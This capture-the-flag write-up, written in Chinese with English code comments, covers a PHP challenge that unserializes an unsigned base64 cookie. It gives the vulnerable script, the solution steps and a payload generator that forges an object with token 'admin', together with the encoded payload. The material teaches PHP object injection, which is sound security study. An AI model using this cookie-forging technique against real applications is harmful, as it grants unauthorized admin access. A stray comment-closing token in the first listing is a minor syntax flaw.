一、代码
<?php
*/
// Print this script's own source into the response, so a visitor can read
// the code that follows.
highlight_file(__FILE__);

// Pull in flag.php. $flag, echoed further down, is not defined in this file;
// presumably flag.php sets it.
include 'flag.php';
/**
 * Plain data holder with a sender, a body, a recipient and a role token.
 *
 * All four properties are public and untyped. When an instance is rebuilt by
 * unserialize(), PHP does not call __construct(): each property takes the
 * value found in the serialized string, and the 'user' default below only
 * applies to a property the string leaves out.
 */
class message
{
    public $from;
    public $msg;
    public $to;

    // Role marker; the script compares it against 'admin' after unserialize().
    public $token = 'user';

    /**
     * @param mixed $f value stored in $from
     * @param mixed $m value stored in $msg
     * @param mixed $t value stored in $to
     */
    public function __construct($f, $m, $t)
    {
        $this->from = $f;
        $this->msg  = $m;
        $this->to   = $t;
    }
}
// The 'msg' cookie is sent by the client and is therefore untrusted input.
if (isset($_COOKIE['msg'])) {
    // 1. Base64-decode the cookie first, then unserialize the result.
    //
    // SECURITY: unserialize() on client-supplied data lets the sender choose
    // the class and every property value of the resulting object (PHP object
    // injection). The cookie carries no signature, so nothing ties it to data
    // the server issued. Safer designs keep the role in server-side session
    // state, or json_decode() a value whose HMAC was verified with
    // hash_equals(). If unserialize() must stay, pass
    // ['allowed_classes' => false] and treat the decoded fields as untrusted.
    $decoded = base64_decode($_COOKIE['msg']);
    $msg = unserialize($decoded);

    // 2. The flag is printed when the object's token equals 'admin'.
    //
    // NOTE: `==` is a loose comparison; `===` would rule out type juggling,
    // but on its own it would not help, because the token is still chosen by
    // the client.
    if ($msg->token == 'admin') {
        echo $flag;
    }
}
二、解题步骤
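- 在本地定义同名的 message 类,直接把 public $token 的值改为 'admin';
- 然后对该对象进行序列化(serialize,而不是反序列化),再进行 base64 编码。
- 原理:服务端直接对客户端可控的 cookie 调用 unserialize,对象的属性值完全由客户端决定,类里的默认值 'user' 起不到任何限制作用。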
三、payload
<?php
/**
 * Local stand-in that shares only the class name with the server-side class.
 *
 * It declares just the $token property, already set to 'admin'. The
 * serialized form records the class name and the property values, so the
 * server-side default of 'user' never comes into play.
 */
class message
{
    public $token = 'admin';
}
// Serialize an instance of the local class, then base64-encode the string,
// mirroring in reverse the base64_decode() + unserialize() done by the server.
$user = new message();
$serialized = serialize($user);
echo base64_encode($serialized);
// Output: Tzo3OiJtZXNzYWdlIjoxOntzOjU6InRva2VuIjtzOjU6ImFkbWluIjt9